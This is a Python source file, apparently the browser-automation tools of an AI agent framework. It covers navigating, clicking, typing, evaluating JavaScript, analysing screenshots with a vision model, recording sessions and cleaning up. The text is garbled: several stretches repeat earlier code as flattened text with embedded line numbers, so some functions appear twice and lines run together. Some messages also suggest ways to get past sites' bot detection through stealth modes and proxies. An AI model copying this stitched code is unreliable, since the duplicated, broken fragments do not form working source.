                if len(snapshot_text) > SNAPSHOT_SUMMARIZE_THRESHOLD:
                    snapshot_text = _truncate_snapshot(snapshot_text)
                response["snapshot"] = snapshot_text
                response["element_count"] = len(refs) if refs else 0
        except Exception as e:
            logger.debug("Auto-snapshot after navigate failed: %s", e)

        return json.dumps(response, ensure_ascii=False)
    else:
        return json.dumps({
            "success": False,
            "error": result.get("error", "Navigation failed")
        }, ensure_ascii=False)
" 1847 "Options: 1) Try adding delays between actions, 2) Access different pages first, " 1848 "3) Enable advanced stealth (BROWSERBASE_ADVANCED_STEALTH=true, requires Scale plan), " 1849 "4) Some sites have very aggressive bot detection that may be unavoidable." 1850 ) 1851 1852 # Include feature info on first navigation so model knows what's active 1853 if is_first_nav and "features" in session_info: 1854 features = session_info["features"] 1855 active_features = [k for k, v in features.items() if v] 1856 if not features.get("proxies"): 1857 response["stealth_warning"] = ( 1858 "Running WITHOUT residential proxies. Bot detection may be more aggressive. " 1859 "Consider upgrading Browserbase plan for proxy support." 1860 ) 1861 response["stealth_features"] = active_features 1862 1863 # Auto-take a compact snapshot so the model can act immediately 1864 # without a separate browser_snapshot call. 1865 try: 1866 snap_result = _run_browser_command(nav_session_key, "snapshot", ["-c"]) 1867 if snap_result.get("success"): 1868 snap_data = snap_result.get("data", {}) 1869 snapshot_text = snap_data.get("snapshot", "") 1870 refs = snap_data.get("refs", {}) 1871 if len(snapshot_text) > SNAPSHOT_SUMMARIZE_THRESHOLD: 1872 snapshot_text = _truncate_snapshot(snapshot_text) 1873 response["snapshot"] = snapshot_text 1874 response["element_count"] = len(refs) if refs else 0 1875 except Exception as e: 1876 logger.debug("Auto-snapshot after navigate failed: %s", e) 1877 1878 return json.dumps(response, ensure_ascii=False) 1879 else: 1880 return json.dumps({ 1881 "success": False, 1882 "error": result.get("error", "Navigation failed") 1883 }, ensure_ascii=False) 1884 1885 1886 def browser_snapshot( 1887 full: bool = False, 1888 task_id: Optional[str] = None, 1889 user_task: Optional[str] = None 1890 ) -> str: 1891 """ 1892 Get a text-based snapshot of the current page's accessibility tree. 1893 1894 Args: 1895 full: If True, return complete snapshot. If False, return compact view. 
1896 task_id: Task identifier for session isolation 1897 user_task: The user's current task (for task-aware extraction) 1898 1899 Returns: 1900 JSON string with page snapshot 1901 """ 1902 if _is_camofox_mode(): 1903 from tools.browser_camofox import camofox_snapshot 1904 return camofox_snapshot(full, task_id, user_task) 1905 1906 effective_task_id = _last_session_key(task_id or "default") 1907 1908 # Build command args based on full flag 1909 args = [] 1910 if not full: 1911 args.extend(["-c"]) # Compact mode 1912 1913 result = _run_browser_command(effective_task_id, "snapshot", args) 1914 1915 if result.get("success"): 1916 data = result.get("data", {}) 1917 snapshot_text = data.get("snapshot", "") 1918 refs = data.get("refs", {}) 1919 1920 # Check if snapshot needs summarization 1921 if len(snapshot_text) > SNAPSHOT_SUMMARIZE_THRESHOLD and user_task: 1922 snapshot_text = _extract_relevant_content(snapshot_text, user_task) 1923 elif len(snapshot_text) > SNAPSHOT_SUMMARIZE_THRESHOLD: 1924 snapshot_text = _truncate_snapshot(snapshot_text) 1925 1926 response = { 1927 "success": True, 1928 "snapshot": snapshot_text, 1929 "element_count": len(refs) if refs else 0 1930 } 1931 1932 # Merge supervisor state (pending dialogs + frame tree) when a CDP 1933 # supervisor is attached to this task. No-op otherwise. See 1934 # website/docs/developer-guide/browser-supervisor.md. 
def browser_click(ref: str, task_id: Optional[str] = None) -> str:
    """
    Click on an element.

    Args:
        ref: Element reference (e.g., "@e5")
        task_id: Task identifier for session isolation

    Returns:
        JSON string with click result
    """
    if _is_camofox_mode():
        from tools.browser_camofox import camofox_click
        return camofox_click(ref, task_id)

    session_key = _last_session_key(task_id or "default")

    # Normalize bare refs ("e5") to the @-prefixed form agent-browser expects.
    if not ref.startswith("@"):
        ref = f"@{ref}"

    outcome = _run_browser_command(session_key, "click", [ref])

    if not outcome.get("success"):
        return json.dumps({
            "success": False,
            "error": outcome.get("error", f"Failed to click {ref}")
        }, ensure_ascii=False)
    return json.dumps({
        "success": True,
        "clicked": ref
    }, ensure_ascii=False)


def browser_type(ref: str, text: str, task_id: Optional[str] = None) -> str:
    """
    Type text into an input field.

    Args:
        ref: Element reference (e.g., "@e3")
        text: Text to type
        task_id: Task identifier for session isolation

    Returns:
        JSON string with type result
    """
    if _is_camofox_mode():
        from tools.browser_camofox import camofox_type
        return camofox_type(ref, text, task_id)

    session_key = _last_session_key(task_id or "default")

    # Normalize bare refs ("e3") to the @-prefixed form agent-browser expects.
    if not ref.startswith("@"):
        ref = f"@{ref}"

    # "fill" clears the field first, then types — avoids appending to stale text.
    outcome = _run_browser_command(session_key, "fill", [ref, text])

    if not outcome.get("success"):
        return json.dumps({
            "success": False,
            "error": outcome.get("error", f"Failed to type into {ref}")
        }, ensure_ascii=False)
    return json.dumps({
        "success": True,
        "typed": text,
        "element": ref
    }, ensure_ascii=False)
def browser_scroll(direction: str, task_id: Optional[str] = None) -> str:
    """
    Scroll the page.

    Args:
        direction: "up" or "down"
        task_id: Task identifier for session isolation

    Returns:
        JSON string with scroll result
    """
    # Reject anything other than the two supported directions up front.
    if direction not in ("up", "down"):
        return json.dumps({
            "success": False,
            "error": f"Invalid direction '{direction}'. Use 'up' or 'down'."
        }, ensure_ascii=False)

    # Single scroll with pixel amount instead of 5x subprocess calls.
    # agent-browser supports: agent-browser scroll down 500
    # ~500px is roughly half a viewport of travel.
    scroll_pixels = 500

    if _is_camofox_mode():
        from tools.browser_camofox import camofox_scroll
        # Camofox REST API doesn't support pixel args; use repeated calls
        outcome = None
        for _ in range(5):
            outcome = camofox_scroll(direction, task_id)
        return outcome

    session_key = _last_session_key(task_id or "default")

    result = _run_browser_command(session_key, "scroll", [direction, str(scroll_pixels)])
    if not result.get("success"):
        return json.dumps({
            "success": False,
            "error": result.get("error", f"Failed to scroll {direction}")
        }, ensure_ascii=False)

    return json.dumps({
        "success": True,
        "scrolled": direction
    }, ensure_ascii=False)
def browser_back(task_id: Optional[str] = None) -> str:
    """
    Navigate back in browser history.

    Args:
        task_id: Task identifier for session isolation

    Returns:
        JSON string with navigation result
    """
    if _is_camofox_mode():
        from tools.browser_camofox import camofox_back
        return camofox_back(task_id)

    session_key = _last_session_key(task_id or "default")
    outcome = _run_browser_command(session_key, "back", [])

    if not outcome.get("success"):
        return json.dumps({
            "success": False,
            "error": outcome.get("error", "Failed to go back")
        }, ensure_ascii=False)

    # Report the URL we landed on after going back.
    landed_url = outcome.get("data", {}).get("url", "")
    return json.dumps({
        "success": True,
        "url": landed_url
    }, ensure_ascii=False)


def browser_press(key: str, task_id: Optional[str] = None) -> str:
    """
    Press a keyboard key.

    Args:
        key: Key to press (e.g., "Enter", "Tab")
        task_id: Task identifier for session isolation

    Returns:
        JSON string with key press result
    """
    if _is_camofox_mode():
        from tools.browser_camofox import camofox_press
        return camofox_press(key, task_id)

    session_key = _last_session_key(task_id or "default")
    outcome = _run_browser_command(session_key, "press", [key])

    if not outcome.get("success"):
        return json.dumps({
            "success": False,
            "error": outcome.get("error", f"Failed to press {key}")
        }, ensure_ascii=False)
    return json.dumps({
        "success": True,
        "pressed": key
    }, ensure_ascii=False)
def browser_console(clear: bool = False, expression: Optional[str] = None, task_id: Optional[str] = None) -> str:
    """Get browser console messages and JavaScript errors, or evaluate JS in the page.

    When ``expression`` is provided, evaluates JavaScript in the page context
    (like the DevTools console) and returns the result. Otherwise returns
    console output (log/warn/error/info) and uncaught exceptions.

    Args:
        clear: If True, clear the message/error buffers after reading
        expression: JavaScript expression to evaluate in the page context
        task_id: Task identifier for session isolation

    Returns:
        JSON string with console messages/errors, or eval result
    """
    # JS evaluation mode takes precedence over buffer reads.
    if expression is not None:
        return _browser_eval(expression, task_id)

    if _is_camofox_mode():
        from tools.browser_camofox import camofox_console
        return camofox_console(clear, task_id)

    session_key = _last_session_key(task_id or "default")

    # Separate flag lists so each subcommand gets its own argument vector.
    console_flags = ["--clear"] if clear else []
    error_flags = ["--clear"] if clear else []

    console_result = _run_browser_command(session_key, "console", console_flags)
    errors_result = _run_browser_command(session_key, "errors", error_flags)

    messages = []
    if console_result.get("success"):
        messages = [
            {
                "type": entry.get("type", "log"),
                "text": entry.get("text", ""),
                "source": "console",
            }
            for entry in console_result.get("data", {}).get("messages", [])
        ]

    errors = []
    if errors_result.get("success"):
        errors = [
            {
                "message": entry.get("message", ""),
                "source": "exception",
            }
            for entry in errors_result.get("data", {}).get("errors", [])
        ]

    return json.dumps({
        "success": True,
        "console_messages": messages,
        "js_errors": errors,
        "total_messages": len(messages),
        "total_errors": len(errors),
    }, ensure_ascii=False)
def _browser_eval(expression: str, task_id: Optional[str] = None) -> str:
    """Evaluate a JavaScript expression in the page context and return the result."""
    if _is_camofox_mode():
        return _camofox_eval(expression, task_id)

    session_key = _last_session_key(task_id or "default")
    outcome = _run_browser_command(session_key, "eval", [expression])

    if not outcome.get("success"):
        err = outcome.get("error", "eval failed")
        # Detect backend capability gaps and give the model a clear signal
        capability_hints = ("unknown command", "not supported", "not found", "no such command")
        lowered = err.lower()
        if any(hint in lowered for hint in capability_hints):
            return json.dumps({
                "success": False,
                "error": f"JavaScript evaluation is not supported by this browser backend. {err}",
            })
        return json.dumps({
            "success": False,
            "error": err,
        })

    raw_result = outcome.get("data", {}).get("result")

    # The eval command returns the JS result as a string. If the string
    # is valid JSON, parse it so the model gets structured data.
    parsed = raw_result
    if isinstance(raw_result, str):
        try:
            parsed = json.loads(raw_result)
        except (json.JSONDecodeError, ValueError):
            pass  # keep as string

    return json.dumps({
        "success": True,
        "result": parsed,
        "result_type": type(parsed).__name__,
    }, ensure_ascii=False, default=str)
def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str:
    """Evaluate JS via Camofox's /tabs/{tab_id}/evaluate endpoint (if available).

    Ensures a tab exists for the task, POSTs the expression, and parses a
    JSON-string result into structured data when possible. Returns a
    JSON-encoded envelope either way; capability errors (404/405/501) get a
    friendlier message since older Camofox servers may lack this endpoint.

    Args:
        expression: JavaScript expression to evaluate in the page context.
        task_id: Task identifier for session isolation.

    Returns:
        JSON string with the eval result, or an error envelope.
    """
    from tools.browser_camofox import _ensure_tab, _post
    try:
        tab_info = _ensure_tab(task_id or "default")
        # Older/newer servers disagree on the tab-id key; accept either.
        tab_id = tab_info.get("tab_id") or tab_info.get("id")
        resp = _post(f"/tabs/{tab_id}/evaluate", body={"expression": expression, "userId": tab_info["user_id"]})

        # Camofox returns the result in a JSON envelope
        raw_result = resp.get("result") if isinstance(resp, dict) else resp
        # If the string result is itself JSON, surface it as structured data.
        parsed = raw_result
        if isinstance(raw_result, str):
            try:
                parsed = json.loads(raw_result)
            except (json.JSONDecodeError, ValueError):
                pass

        return json.dumps({
            "success": True,
            "result": parsed,
            "result_type": type(parsed).__name__,
        }, ensure_ascii=False, default=str)
    except Exception as e:
        error_msg = str(e)
        # Graceful degradation — server may not support eval
        if any(code in error_msg for code in ("404", "405", "501")):
            return json.dumps({
                "success": False,
                "error": "JavaScript evaluation is not supported by this Camofox server. "
                         "Use browser_snapshot or browser_vision to inspect page state.",
            })
        # NOTE(review): sibling error paths return json.dumps envelopes while
        # this one delegates to tool_error — confirm the envelopes match.
        return tool_error(error_msg, success=False)
def _maybe_start_recording(task_id: str):
    """Start recording if browser.record_sessions is enabled in config.

    Best-effort: any failure (missing config, unsupported backend, CLI
    error) is logged at debug level and never interrupts the caller.

    Args:
        task_id: Session key whose browser should be recorded.
    """
    # Fast-path skip when already recording. NOTE(review): the lock is
    # released between this check and the later add(), so two concurrent
    # callers could both issue "record start" — presumably harmless since
    # the second start is a no-op on the CLI side; confirm.
    with _cleanup_lock:
        if task_id in _recording_sessions:
            return
    try:
        from hermes_cli.config import read_raw_config
        hermes_home = get_hermes_home()
        cfg = read_raw_config()
        record_enabled = cfg_get(cfg, "browser", "record_sessions", default=False)

        if not record_enabled:
            return

        recordings_dir = hermes_home / "browser_recordings"
        recordings_dir.mkdir(parents=True, exist_ok=True)
        # Prune stale recordings before adding a new one.
        _cleanup_old_recordings(max_age_hours=72)

        # Timestamped filename; task_id is truncated to keep paths short.
        timestamp = time.strftime("%Y%m%d_%H%M%S")
        recording_path = recordings_dir / f"session_{timestamp}_{task_id[:16]}.webm"

        result = _run_browser_command(task_id, "record", ["start", str(recording_path)])
        if result.get("success"):
            with _cleanup_lock:
                _recording_sessions.add(task_id)
            logger.info("Auto-recording browser session %s to %s", task_id, recording_path)
        else:
            logger.debug("Could not start auto-recording: %s", result.get("error"))
    except Exception as e:
        logger.debug("Auto-recording setup failed: %s", e)


def _maybe_stop_recording(task_id: str):
    """Stop recording if one is active for this session.

    Always removes ``task_id`` from the active-recording registry (in the
    ``finally``), even when "record stop" fails, so a broken session cannot
    permanently wedge the set.

    Args:
        task_id: Session key whose recording should be finalized.
    """
    with _cleanup_lock:
        if task_id not in _recording_sessions:
            return
    try:
        result = _run_browser_command(task_id, "record", ["stop"])
        if result.get("success"):
            path = result.get("data", {}).get("path", "")
            logger.info("Saved browser recording for session %s: %s", task_id, path)
    except Exception as e:
        logger.debug("Could not stop recording for %s: %s", task_id, e)
    finally:
        with _cleanup_lock:
            _recording_sessions.discard(task_id)
result.get("data", {}).get("path", "") 2309 logger.info("Saved browser recording for session %s: %s", task_id, path) 2310 except Exception as e: 2311 logger.debug("Could not stop recording for %s: %s", task_id, e) 2312 finally: 2313 with _cleanup_lock: 2314 _recording_sessions.discard(task_id) 2315 2316 2317 def browser_get_images(task_id: Optional[str] = None) -> str: 2318 """ 2319 Get all images on the current page. 2320 2321 Args: 2322 task_id: Task identifier for session isolation 2323 2324 Returns: 2325 JSON string with list of images (src and alt) 2326 """ 2327 if _is_camofox_mode(): 2328 from tools.browser_camofox import camofox_get_images 2329 return camofox_get_images(task_id) 2330 2331 effective_task_id = _last_session_key(task_id or "default") 2332 2333 # Use eval to run JavaScript that extracts images 2334 js_code = """JSON.stringify( 2335 [...document.images].map(img => ({ 2336 src: img.src, 2337 alt: img.alt || '', 2338 width: img.naturalWidth, 2339 height: img.naturalHeight 2340 })).filter(img => img.src && !img.src.startsWith('data:')) 2341 )""" 2342 2343 result = _run_browser_command(effective_task_id, "eval", [js_code]) 2344 2345 if result.get("success"): 2346 data = result.get("data", {}) 2347 raw_result = data.get("result", "[]") 2348 2349 try: 2350 # Parse the JSON string returned by JavaScript 2351 if isinstance(raw_result, str): 2352 images = json.loads(raw_result) 2353 else: 2354 images = raw_result 2355 2356 return json.dumps({ 2357 "success": True, 2358 "images": images, 2359 "count": len(images) 2360 }, ensure_ascii=False) 2361 except json.JSONDecodeError: 2362 return json.dumps({ 2363 "success": True, 2364 "images": [], 2365 "count": 0, 2366 "warning": "Could not parse image data" 2367 }, ensure_ascii=False) 2368 else: 2369 return json.dumps({ 2370 "success": False, 2371 "error": result.get("error", "Failed to get images") 2372 }, ensure_ascii=False) 2373 2374 2375 def browser_vision(question: str, annotate: bool = False, task_id: 
def browser_vision(question: str, annotate: bool = False, task_id: Optional[str] = None) -> str:
    """
    Take a screenshot of the current page and analyze it with vision AI.

    This tool captures what's visually displayed in the browser and sends it
    to Gemini for analysis. Useful for understanding visual content that the
    text-based snapshot may not capture (CAPTCHAs, verification challenges,
    images, complex layouts, etc.).

    The screenshot is saved persistently and its file path is returned alongside
    the analysis, so it can be shared with users via MEDIA:<path> in the response.

    Args:
        question: What you want to know about the page visually
        annotate: If True, overlay numbered [N] labels on interactive elements
        task_id: Task identifier for session isolation

    Returns:
        JSON string with vision analysis results and screenshot_path
    """
    if _is_camofox_mode():
        from tools.browser_camofox import camofox_vision
        return camofox_vision(question, annotate, task_id)

    import base64
    import uuid as uuid_mod
    effective_task_id = _last_session_key(task_id or "default")

    # Save screenshot to persistent location so it can be shared with users
    from hermes_constants import get_hermes_dir
    screenshots_dir = get_hermes_dir("cache/screenshots", "browser_screenshots")
    # Random hex filename avoids collisions between concurrent tasks.
    screenshot_path = screenshots_dir / f"browser_screenshot_{uuid_mod.uuid4().hex}.png"

    try:
        screenshots_dir.mkdir(parents=True, exist_ok=True)

        # Prune old screenshots (older than 24 hours) to prevent unbounded disk growth
        _cleanup_old_screenshots(screenshots_dir, max_age_hours=24)

        # Take screenshot using agent-browser; annotated captures are taken
        # full-page so every labeled element is visible.
        screenshot_args = []
        if annotate:
            screenshot_args.append("--annotate")
            screenshot_args.append("--full")
        screenshot_args.append(str(screenshot_path))
        result = _run_browser_command(
            effective_task_id,
            "screenshot",
            screenshot_args,
        )

        if not result.get("success"):
            error_detail = result.get("error", "Unknown error")
            # Include backend mode in the error so failures are diagnosable.
            _cp = _get_cloud_provider()
            mode = "local" if _cp is None else f"cloud ({_cp.provider_name()})"
            return json.dumps({
                "success": False,
                "error": f"Failed to take screenshot ({mode} mode): {error_detail}"
            }, ensure_ascii=False)

        # The backend may have written the file somewhere else; trust its path.
        actual_screenshot_path = result.get("data", {}).get("path")
        if actual_screenshot_path:
            screenshot_path = Path(actual_screenshot_path)

        # Check if screenshot file was created
        if not screenshot_path.exists():
            _cp = _get_cloud_provider()
            mode = "local" if _cp is None else f"cloud ({_cp.provider_name()})"
            return json.dumps({
                "success": False,
                "error": (
                    f"Screenshot file was not created at {screenshot_path} ({mode} mode). "
                    f"This may indicate a socket path issue (macOS /var/folders/), "
                    f"a missing Chromium install ('agent-browser install'), "
                    f"or a stale daemon process."
                ),
            }, ensure_ascii=False)

        # Convert screenshot to base64 at full resolution.
        _screenshot_bytes = screenshot_path.read_bytes()
        _screenshot_b64 = base64.b64encode(_screenshot_bytes).decode("ascii")
        data_url = f"data:image/png;base64,{_screenshot_b64}"

        vision_prompt = (
            f"You are analyzing a screenshot of a web browser.\n\n"
            f"User's question: {question}\n\n"
            f"Provide a detailed and helpful answer based on what you see in the screenshot. "
            f"If there are interactive elements, describe them. If there are verification challenges "
            f"or CAPTCHAs, describe what type they are and what action might be needed. "
            f"Focus on answering the user's specific question."
        )

        # Use the centralized LLM router
        vision_model = _get_vision_model()
        logger.debug("browser_vision: analysing screenshot (%d bytes)",
                     len(_screenshot_bytes))

        # Read vision timeout/temperature from config (auxiliary.vision.*).
        # Local vision models (llama.cpp, ollama) can take well over 30s for
        # screenshot analysis, so the default timeout must be generous.
        vision_timeout = 120.0
        vision_temperature = 0.1
        try:
            from hermes_cli.config import load_config
            _cfg = load_config()
            _vision_cfg = cfg_get(_cfg, "auxiliary", "vision", default={})
            _vt = _vision_cfg.get("timeout")
            if _vt is not None:
                vision_timeout = float(_vt)
            _vtemp = _vision_cfg.get("temperature")
            if _vtemp is not None:
                vision_temperature = float(_vtemp)
        except Exception:
            # Config problems fall back to the generous defaults above.
            pass

        call_kwargs = {
            "task": "vision",
            "messages": [
                {
                    "role": "user",
                    "content": [
                        {"type": "text", "text": vision_prompt},
                        {"type": "image_url", "image_url": {"url": data_url}},
                    ],
                }
            ],
            "max_tokens": 2000,
            "temperature": vision_temperature,
            "timeout": vision_timeout,
        }
        if vision_model:
            call_kwargs["model"] = vision_model
        # Try full-size screenshot; on size-related rejection, downscale and retry.
        try:
            response = call_llm(**call_kwargs)
        except Exception as _api_err:
            from tools.vision_tools import (
                _is_image_size_error, _resize_image_for_vision, _RESIZE_TARGET_BYTES,
            )
            if (_is_image_size_error(_api_err)
                    and len(data_url) > _RESIZE_TARGET_BYTES):
                logger.info(
                    "Vision API rejected screenshot (%.1f MB); "
                    "auto-resizing to ~%.0f MB and retrying...",
                    len(data_url) / (1024 * 1024),
                    _RESIZE_TARGET_BYTES / (1024 * 1024),
                )
                data_url = _resize_image_for_vision(
                    screenshot_path, mime_type="image/png")
                # Swap the resized image into the original request and retry once.
                call_kwargs["messages"][0]["content"][1]["image_url"]["url"] = data_url
                response = call_llm(**call_kwargs)
            else:
                raise

        analysis = (response.choices[0].message.content or "").strip()
        # Redact secrets the vision LLM may have read from the screenshot.
        from agent.redact import redact_sensitive_text
        analysis = redact_sensitive_text(analysis)
        response_data = {
            "success": True,
            "analysis": analysis or "Vision analysis returned no content.",
            "screenshot_path": str(screenshot_path),
        }
        # Include annotation data if annotated screenshot was taken
        if annotate and result.get("data", {}).get("annotations"):
            response_data["annotations"] = result["data"]["annotations"]
        return json.dumps(response_data, ensure_ascii=False)

    except Exception as e:
        # Keep the screenshot if it was captured successfully — the failure is
        # in the LLM vision analysis, not the capture. Deleting a valid
        # screenshot loses evidence the user might need. The 24-hour cleanup
        # in _cleanup_old_screenshots prevents unbounded disk growth.
        logger.warning("browser_vision failed: %s", e, exc_info=True)
        error_info = {"success": False, "error": f"Error during vision analysis: {str(e)}"}
        if screenshot_path.exists():
            error_info["screenshot_path"] = str(screenshot_path)
            error_info["note"] = "Screenshot was captured but vision analysis failed. You can still share it via MEDIA:<path>."
        return json.dumps(error_info, ensure_ascii=False)
def _cleanup_old_screenshots(screenshots_dir, max_age_hours=24):
    """Remove browser screenshots older than max_age_hours to prevent disk bloat.

    Throttled to run at most once per hour per directory to avoid repeated
    scans on screenshot-heavy workflows.
    """
    dir_key = str(screenshots_dir)
    now = time.time()
    # Per-directory throttle: skip if we scanned this directory within the hour.
    if now - _last_screenshot_cleanup_by_dir.get(dir_key, 0.0) < 3600:
        return
    _last_screenshot_cleanup_by_dir[dir_key] = now

    try:
        cutoff = time.time() - (max_age_hours * 3600)
        for candidate in screenshots_dir.glob("browser_screenshot_*.png"):
            try:
                if candidate.stat().st_mtime < cutoff:
                    candidate.unlink()
            except Exception as exc:
                logger.debug("Failed to clean old screenshot %s: %s", candidate, exc)
    except Exception as exc:
        logger.debug("Screenshot cleanup error (non-critical): %s", exc)
2561 """ 2562 key = str(screenshots_dir) 2563 now = time.time() 2564 if now - _last_screenshot_cleanup_by_dir.get(key, 0.0) < 3600: 2565 return 2566 _last_screenshot_cleanup_by_dir[key] = now 2567 2568 try: 2569 cutoff = time.time() - (max_age_hours * 3600) 2570 for f in screenshots_dir.glob("browser_screenshot_*.png"): 2571 try: 2572 if f.stat().st_mtime < cutoff: 2573 f.unlink() 2574 except Exception as e: 2575 logger.debug("Failed to clean old screenshot %s: %s", f, e) 2576 except Exception as e: 2577 logger.debug("Screenshot cleanup error (non-critical): %s", e) 2578 2579 2580 def _cleanup_old_recordings(max_age_hours=72): 2581 """Remove browser recordings older than max_age_hours to prevent disk bloat.""" 2582 try: 2583 hermes_home = get_hermes_home() 2584 recordings_dir = hermes_home / "browser_recordings" 2585 if not recordings_dir.exists(): 2586 return 2587 cutoff = time.time() - (max_age_hours * 3600) 2588 for f in recordings_dir.glob("session_*.webm"): 2589 try: 2590 if f.stat().st_mtime < cutoff: 2591 f.unlink() 2592 except Exception as e: 2593 logger.debug("Failed to clean old recording %s: %s", f, e) 2594 except Exception as e: 2595 logger.debug("Recording cleanup error (non-critical): %s", e) 2596 2597 2598 # ============================================================================ 2599 # Cleanup and Management Functions 2600 # ============================================================================ 2601 2602 def cleanup_browser(task_id: Optional[str] = None) -> None: 2603 """ 2604 Clean up browser session(s) for a task. 2605 2606 Called automatically when a task completes or when inactivity timeout is reached. 2607 Closes both the agent-browser/Browserbase session and Camofox sessions. 2608 2609 When ``task_id`` is a bare task identifier (no ``::local`` suffix), reaps 2610 BOTH the cloud/primary session AND any hybrid-routing local sidecar that 2611 may have been spawned for LAN/localhost URLs in the same task. 
When 2612 ``task_id`` already carries a ``::local`` suffix (called from the inactivity 2613 cleanup loop against a specific session key), reaps only that one. 2614 2615 Args: 2616 task_id: Task identifier (or explicit session key) 2617 """ 2618 if task_id is None: 2619 task_id = "default" 2620 2621 # Expand to the full set of session keys to reap. For a bare task_id 2622 # that includes the cloud/primary key + the local sidecar if one exists. 2623 if _is_local_sidecar_key(task_id): 2624 session_keys = [task_id] 2625 bare_task_id = task_id[: -len(_LOCAL_SUFFIX)] 2626 else: 2627 session_keys = [task_id] 2628 sidecar_key = f"{task_id}{_LOCAL_SUFFIX}" 2629 with _cleanup_lock: 2630 if sidecar_key in _active_sessions: 2631 session_keys.append(sidecar_key) 2632 bare_task_id = task_id 2633 2634 for session_key in session_keys: 2635 _cleanup_single_browser_session(session_key) 2636 2637 # Drop the last-active pointer only when the bare task is being cleaned 2638 # (i.e. not when we're only reaping a sidecar mid-task). 2639 if not _is_local_sidecar_key(task_id): 2640 _last_active_session_key.pop(bare_task_id, None) 2641 2642 2643 def _cleanup_single_browser_session(task_id: str) -> None: 2644 """Internal: reap a single browser session by its exact session key.""" 2645 # Stop the CDP supervisor for this task FIRST so we close our WebSocket 2646 # before the backend tears down the underlying CDP endpoint. 2647 _stop_cdp_supervisor(task_id) 2648 2649 # Also clean up Camofox session if running in Camofox mode. 2650 # Skip full close when managed persistence is enabled — the browser 2651 # profile (and its session cookies) must survive across agent tasks. 2652 # The inactivity reaper still frees idle resources. 
    if _is_camofox_mode():
        try:
            from tools.browser_camofox import camofox_close, camofox_soft_cleanup
            # Soft cleanup (keeps the persistent profile alive) is preferred;
            # fall back to a full close only when it declines.
            if not camofox_soft_cleanup(task_id):
                camofox_close(task_id)
        except Exception as e:
            logger.debug("Camofox cleanup for task %s: %s", task_id, e)

    logger.debug("cleanup_browser called for task_id: %s", task_id)
    logger.debug("Active sessions: %s", list(_active_sessions.keys()))

    # Check if session exists (under lock), but don't remove yet -
    # _run_browser_command needs it to build the close command.
    with _cleanup_lock:
        session_info = _active_sessions.get(task_id)

    if session_info:
        # "unknown" default exists for the log line below; real sessions store
        # bb_session_id explicitly (None for local sidecars). NOTE(review): if
        # the key were ever absent, the truthy "unknown" string would reach the
        # cloud-close branch below — verify all session dicts set the key.
        bb_session_id = session_info.get("bb_session_id", "unknown")
        logger.debug("Found session for task %s: bb_session_id=%s", task_id, bb_session_id)

        # Stop auto-recording before closing (saves the file)
        _maybe_stop_recording(task_id)

        # Try to close via agent-browser first (needs session in _active_sessions)
        try:
            _run_browser_command(task_id, "close", [], timeout=10)
            logger.debug("agent-browser close command completed for task %s", task_id)
        except Exception as e:
            logger.warning("agent-browser close failed for task %s: %s", task_id, e)

        # Now remove from tracking under lock
        with _cleanup_lock:
            _active_sessions.pop(task_id, None)
            _session_last_activity.pop(task_id, None)

        # Cloud mode: close the cloud browser session via provider API.
        # Local sidecars have bb_session_id=None so this no-ops for them.
        if bb_session_id:
            provider = _get_cloud_provider()
            if provider is not None:
                try:
                    provider.close_session(bb_session_id)
                except Exception as e:
                    logger.warning("Could not close cloud browser session: %s", e)

        # Kill the daemon process and clean up socket directory
        session_name = session_info.get("session_name", "")
        if session_name:
            socket_dir = os.path.join(_socket_safe_tmpdir(), f"agent-browser-{session_name}")
            if os.path.exists(socket_dir):
                # agent-browser writes {session}.pid in the socket dir
                pid_file = os.path.join(socket_dir, f"{session_name}.pid")
                if os.path.isfile(pid_file):
                    try:
                        daemon_pid = int(Path(pid_file).read_text().strip())
                        os.kill(daemon_pid, signal.SIGTERM)
                        logger.debug("Killed daemon pid %s for %s", daemon_pid, session_name)
                    except (ProcessLookupError, ValueError, PermissionError, OSError):
                        # Already dead, stale pid file, or not ours to kill.
                        logger.debug("Could not kill daemon pid for %s (already dead or inaccessible)", session_name)
                shutil.rmtree(socket_dir, ignore_errors=True)

        logger.debug("Removed task %s from active sessions", task_id)
    else:
        logger.debug("No active session found for task_id: %s", task_id)


def cleanup_all_browsers() -> None:
    """
    Clean up all active browser sessions.

    Useful for cleanup on shutdown. Also stops all CDP supervisor threads and
    resets the module's cached binary/timeout/Chromium lookups so they are
    re-discovered on next use.
    """
    # Snapshot keys under the lock; cleanup_browser re-acquires it per task.
    with _cleanup_lock:
        task_ids = list(_active_sessions.keys())
    for task_id in task_ids:
        cleanup_browser(task_id)

    # Tear down CDP supervisors for all tasks so background threads exit.
    try:
        from tools.browser_supervisor import SUPERVISOR_REGISTRY  # type: ignore[import-not-found]
        SUPERVISOR_REGISTRY.stop_all()
    except Exception:
        pass

    # Reset cached lookups so they are re-evaluated on next use.
    global _cached_agent_browser, _agent_browser_resolved
    global _cached_command_timeout, _command_timeout_resolved
    global _cached_chromium_installed
    _cached_agent_browser = None
    _agent_browser_resolved = False
    _discover_homebrew_node_dirs.cache_clear()
    _cached_command_timeout = None
    _command_timeout_resolved = False
    _cached_chromium_installed = None

# ============================================================================
# Requirements Check
# ============================================================================


# Cache for Chromium discovery. Invalidated by _reset_browser_caches.
_cached_chromium_installed: Optional[bool] = None


def _chromium_search_roots() -> List[str]:
    """Directories to scan for a Chromium / headless-shell build.

    Order mirrors what agent-browser and Playwright actually probe:

    1. ``PLAYWRIGHT_BROWSERS_PATH`` when set (Docker image sets this to
       ``/opt/hermes/.playwright``).
    2. ``~/.cache/ms-playwright`` — Playwright's default on Linux/macOS.
    3. ``~/Library/Caches/ms-playwright`` — Playwright's default on macOS.
    4. ``%USERPROFILE%\\AppData\\Local\\ms-playwright`` — Playwright's default
       on Windows.
    """
    roots: List[str] = []
    env_path = os.environ.get("PLAYWRIGHT_BROWSERS_PATH", "").strip()
    # "0" is excluded — presumably Playwright's sentinel meaning "browsers
    # live under node_modules", not a scannable directory. TODO confirm.
    if env_path and env_path != "0":
        roots.append(env_path)
    home = os.path.expanduser("~")
    roots.append(os.path.join(home, ".cache", "ms-playwright"))
    if sys.platform == "darwin":
        roots.append(os.path.join(home, "Library", "Caches", "ms-playwright"))
    if sys.platform == "win32":
        local = os.environ.get("LOCALAPPDATA") or os.path.join(
            home, "AppData", "Local"
        )
        roots.append(os.path.join(local, "ms-playwright"))
    return roots


def _chromium_installed() -> bool:
    """Return True when a usable Chromium (or headless-shell) build is on disk.

    Checks, in order:

    1. ``AGENT_BROWSER_EXECUTABLE_PATH`` env var — the official way to point
       agent-browser at a pre-installed Chrome/Chromium.
    2. System Chrome/Chromium in PATH (``google-chrome``, ``chromium-browser``,
